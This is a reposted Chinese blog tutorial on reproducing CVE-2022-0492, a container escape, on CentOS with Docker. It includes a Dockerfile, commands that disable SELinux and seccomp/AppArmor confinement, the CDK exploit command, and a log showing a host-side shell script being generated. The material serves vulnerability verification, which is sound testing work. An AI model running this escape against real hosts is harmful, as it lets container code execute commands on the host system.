码上欢乐
相关内容   简体   繁体

centos CVE-2022-0492漏洞复现方法 简单版

本文转载自  查看原文  2022-04-07 21:54  1055 

1. 下载最新 的 cdk 下载链接 https://github.com/cdk-team/CDK/releases 

2、制作镜像:Dockerfile如下

FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>

RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
apt update -y && \
apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
rm -rf /var/cache/apt

CMD ["/bin/bash", "-c", "sleep 9999"]

docker build -t rinchat/test:CVE-2022-0492 . 

已经上传到镜像仓库rinchat/test:CVE-2022-0492 拉取即可

3. 临时关闭selinux 

setenforce 0

开启用户命名空间

echo user.max_user_namespaces=15000 >/etc/sysctl.d/90-max_net_namespaces.conf
sysctl -p /etc/sysctl.d /etc/sysctl.d/90-max_net_namespaces.conf

当前目录下有cdk 文件

4. docker run -d -v  `pwd`:/test  --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined"   --name test rinchat/test:CVE-2022-0492

 

docker exec 容器内执行:./cdk run abuse-unpriv-userns "touch /root/hacked"
查看宿主机是否有 /root/hacked 目录有了则存在漏洞说明 容器内部可以执行宿主机命令

存在漏洞时候日志:

root@2de2c952ccf1:/test# ./cdk run abuse-unpriv-userns "touch /root/hacked"
2022/04/07 15:27:31 User-Defined Shell Payload: touch /root/hacked
2022/04/07 15:27:31 current cgroup for exploit: rdma
2022/04/07 15:27:31 user-defined shell payload is: touch /root/hacked
2022/04/07 15:27:31 Found hostpath: /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper
2022/04/07 15:27:31 generate shell exploit with user-input cmd:

touch /root/hacked

final shell exploit is:

#!/bin/sh
touch /root/hacked > /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper/cdk_cgres_XCXT

2022/04/07 15:27:31 shell script saved to /cdk_cgexp_XCXT.sh
2022/04/07 15:27:36 Execute Result:

 

测试发现4.11内核以上存在bug

内核下载链接:http://193.49.22.109/elrepo/kernel/el7/x86_64/RPMS/

docker 版本

[root@localhost ~]# docker version
Client: Docker Engine - Community
Version: 20.10.0
API version: 1.41
Go version: go1.13.15
Git commit: 7287ab3
Built: Tue Dec 8 18:54:00 2020
OS/Arch: linux/amd64
Context: default
Experimental: true

Server: Docker Engine - Community
Engine:
Version: 20.10.0
API version: 1.41 (minimum version 1.12)
Go version: go1.13.15
Git commit: eeddea2
Built: Tue Dec 8 18:58:04 2020
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: v1.4.3
GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
runc:
Version: 1.0.0-rc92
GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
docker-init:
Version: 0.19.0
GitCommit: de40ad0





免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 springboot漏洞复现(CVE-2022-22965) 【漏洞】脏管漏洞 CVE-2022-0847(复现) Zabbix登录绕过漏洞复现(CVE-2022-23131) Dubbo 漏洞 CVE-2020-1948 复现+简单修复 CVE-2018-7600 Drupal漏洞原理的简单分析与复现 【漏洞复现】CVE-2022–21661 WordPress核心框架WP_Query SQL注入漏洞原理分析与复现 Spring Framework远程代码执行漏洞复现(CVE-2022-22965) OpenSSL CVE-2022-0778漏洞问题复现与非法证书构造 CVE-2022-22965 Spring Framework远程代码执行漏洞复现 Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现及分析
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM